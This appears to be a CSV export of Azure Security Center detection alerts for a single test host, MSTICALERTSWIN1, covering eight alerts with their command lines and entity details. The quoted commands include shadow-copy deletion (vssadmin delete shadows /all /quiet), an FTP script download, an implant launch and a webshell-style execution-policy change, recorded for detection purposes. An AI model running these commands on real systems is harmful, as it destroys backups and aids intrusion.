98,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:14,2019-01-15 05:15:14,28f9a2e6-1925-455e-ad97-7af7f92f521d,2518547714857061520_28f9a2e6-1925-455e-ad97-7af7f92f521d,Detection,Microsoft,Suspicious system process executed,Suspicious system process executed,Suspicious system process executed,The system process c:\windows\fonts\csrss.exe was observed running in an abnormal context. Malware often uses this process name to masquerade its malicious activity.,Medium,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\fonts\\csrss.exe"",
""command line"": ""c:\\windows\\fonts\\csrss.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x178c"",
""account logon id"": ""0xfaac27"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xbc8"",
""System Process"": ""CSRSS.EXE"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x178c"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:14.2938479Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:14.2938479Z"",
""EndTimeUtc"": ""2019-01-15T05:15:14.2938479Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
99,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,8e73946b-ebea-4625-aa60-d97b82dcfb07,2518547714835690929_8e73946b-ebea-4625-aa60-d97b82dcfb07,Detection,Microsoft,Detected suspicious execution via rundll32.exe,Detected suspicious execution via rundll32.exe,Detected suspicious execution via rundll32.exe,"Analysis of host data on MSTICALERTSWIN1 detected rundll32.exe being used to execute a process with an uncommon name, consistent with the process naming scheme previously seen used by activity group GOLD when installing their first stage implant on a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\rundll32.exe"",
""Suspicious Command Line"": "".\\rundll32 /c 1234.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x176c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: GOLD\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-GOLD.pdf?sv=2018-03-28&sr=b&sig=vAwQabeTf42yaWjRqLZXxfkyAHl%2B97yko7Ag7o9mKl4%3D&spr=https&st=2019-01-14T11:45:20Z&se=2019-04-14T12:00:20Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=9083b91f-eeee-467c-9770-82df2b1f0420\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""rundll32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x176c"",
""CommandLine"": "".\\rundll32 /c 1234.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.430907Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.430907Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.430907Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
100,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,f0d023fb-376f-46ab-9976-a5825d826bea,2518547714837217151_f0d023fb-376f-46ab-9976-a5825d826bea,Detection,Microsoft,Detected possible local reconnaissance activity,Detected possible local reconnaissance activity,Detected possible local reconnaissance activity,"Analysis of host data on MSTICALERTSWIN1 detected a combination of systeminfo commands that has previously been associated with one of activity group GOLD's methods of performing reconnaissance activity. While 'systeminfo.exe' is a legitimate Windows tool, executing it twice in succession in the way that has occurred here is rare.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c \""systeminfo && systeminfo\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1700"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: GOLD\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-GOLD.pdf?sv=2018-03-28&sr=b&sig=gZIu70ASn2QQWQr7mWVPRdyyOiWSYbXqRQl0ux505Hk%3D&spr=https&st=2019-01-15T05:00:22Z&se=2019-04-15T05:15:22Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=40dcc8bf-0478-4f3b-b275-ed0a94f2c013\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1700"",
""CommandLine"": ""cmd /c \""systeminfo && systeminfo\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.2782848Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.2782848Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.2782848Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
101,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:15,2019-01-15 05:15:15,265472ff-3820-4dad-8da7-00e39e1a99fd,2518547714843218505_265472ff-3820-4dad-8da7-00e39e1a99fd,Detection,Microsoft,Detected suspicious use of FTP -s Switch,Detected suspicious use of FTP -s Switch,Detected suspicious use of FTP -s Switch,"Analysis of process creation data from the MSTICALERTSWIN1 detected the use of FTP's ""-s:filename"" switch. This switch is used to specify an FTP script file for the client to run. Malware or malicious processes are known to use this FTP switch (-s:filename) to point to a script file which is configured to connect to a remote FTP server and download additional malicious binaries.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\ftp.exe"",
""Suspicious Command Line"": "".\\ftp -s:c:\\recycler\\xxppyy.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1580"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""ftp.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1580"",
""CommandLine"": "".\\ftp -s:c:\\recycler\\xxppyy.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:15.6781494Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:15.6781494Z"",
""EndTimeUtc"": ""2019-01-15T05:15:15.6781494Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
102,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:17,2019-01-15 05:15:17,6c6836bb-23cd-4b31-b78e-08360c5a4f83,2518547714828638992_6c6836bb-23cd-4b31-b78e-08360c5a4f83,Detection,Microsoft,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,"Analysis of host data has detected a shadow copy deletion activity on the resource.
Volume Shadow Copy (VSC) is an important artifact that stores data snapshots.
Some malware, and specifically Ransomware, targets VSC to sabotage backup strategies.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\vssadmin.exe"",
""command line"": ""vssadmin delete shadows /all /quiet"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1550"",
""account logon id"": ""0xfaac27"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xbc8"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=OcPH4bb3Av9YNRujbUEnDNuo1H8gwII8Q2sejnoqv2U%3D&spr=https&st=2019-01-14T15:16:13Z&se=2019-04-14T15:31:13Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=0c8d0493-55c3-4b3f-a0b0-c8d4d2ce0343\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""vssadmin.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1550"",
""CommandLine"": ""vssadmin delete shadows /all /quiet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:17.1361007Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:17.1361007Z"",
""EndTimeUtc"": ""2019-01-15T05:15:17.1361007Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
103,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:12,2019-01-15 05:15:12,b080127b-d5c1-425e-a7ca-e4bbd873009d,2518547714879970078_b080127b-d5c1-425e-a7ca-e4bbd873009d,Detection,Microsoft,Detected suspicious document credentials,Detected suspicious document credentials,Detected suspicious document credentials,"Analysis of host data on MSTICALERTSWIN1 detected a suspicious, common precomputed password hash used by malware being used to execute a file. Activity group HYDROGEN has been known to use this password to execute malware on a victim host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\implant.exe"",
""Suspicious Command Line"": ""implant.exe 81ed03caf6901e444c72ac67d192fb9c"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1250"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: HYDROGEN\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-HYDROGEN.pdf?sv=2018-03-28&sr=b&sig=l6t8ZuaUnahnOzfG6x08jl0SnF%2Bad6OtU8cbvfK0AV8%3D&spr=https&st=2019-01-14T11:45:28Z&se=2019-04-14T12:00:28Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=9083b91f-eeee-467c-9770-82df2b1f0420\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""implant.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1250"",
""CommandLine"": ""implant.exe 81ed03caf6901e444c72ac67d192fb9c"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:12.0029921Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:12.0029921Z"",
""EndTimeUtc"": ""2019-01-15T05:15:12.0029921Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:14,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
104,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,b56b9e61-fefb-47a3-a34f-7c1b44f8268a,2518547714832788202_b56b9e61-fefb-47a3-a34f-7c1b44f8268a,Detection,Microsoft,Detected suspicious Set-ExecutionPolicy and WinRM changes,Detected suspicious Set-ExecutionPolicy and WinRM changes,Detected suspicious Set-ExecutionPolicy and WinRM changes,"Analysis of host data detected changes being made through the Set-ExecutionPolicy cmdlet to enable RemoteSigned, as well as configuration changes to WinRM (Windows Remote Management). Changes of this nature are indicative of use of the ChinaChopper webshell on the affected host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": "".\\cmd /c \""cd /d \""c:\\inetpub\\wwwroot\""&powershell set-executionpolicy remotesigned&echo [s]&cd&echo [e]\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1404"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1404"",
""CommandLine"": "".\\cmd /c \""cd /d \""c:\\inetpub\\wwwroot\""&powershell set-executionpolicy remotesigned&echo [s]&cd&echo [e]\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.7211797Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.7211797Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.7211797Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
105,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:17,2019-01-15 05:15:17,2b2ff728-1a2a-46e8-a49a-6991e074a740,2518547714828736209_2b2ff728-1a2a-46e8-a49a-6991e074a740,Detection,Microsoft,Suspicious double extension file executed,Suspicious double extension file executed,Suspicious double extension file executed,"Analysis of host data indicates an execution of a process with a suspicious double extension.
This extension may trick users into thinking files are safe to be opened and might indicate the presence of malware on the system.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x155c"",
""account logon id"": ""0xfaac27"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xbc8"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious Double Extensions\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-Double-Extensions.pdf?sv=2018-03-28&sr=b&sig=Rn%2BFQB1fRVwx2j4BzKu%2B5dG0W00AKxVkRkz4SPc%2BCVE%3D&spr=https&st=2019-01-14T15:13:01Z&se=2019-04-14T15:28:01Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""doubleextension.pdf.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x155c"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:17.126379Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:17.126379Z"",
""EndTimeUtc"": ""2019-01-15T05:15:17.126379Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
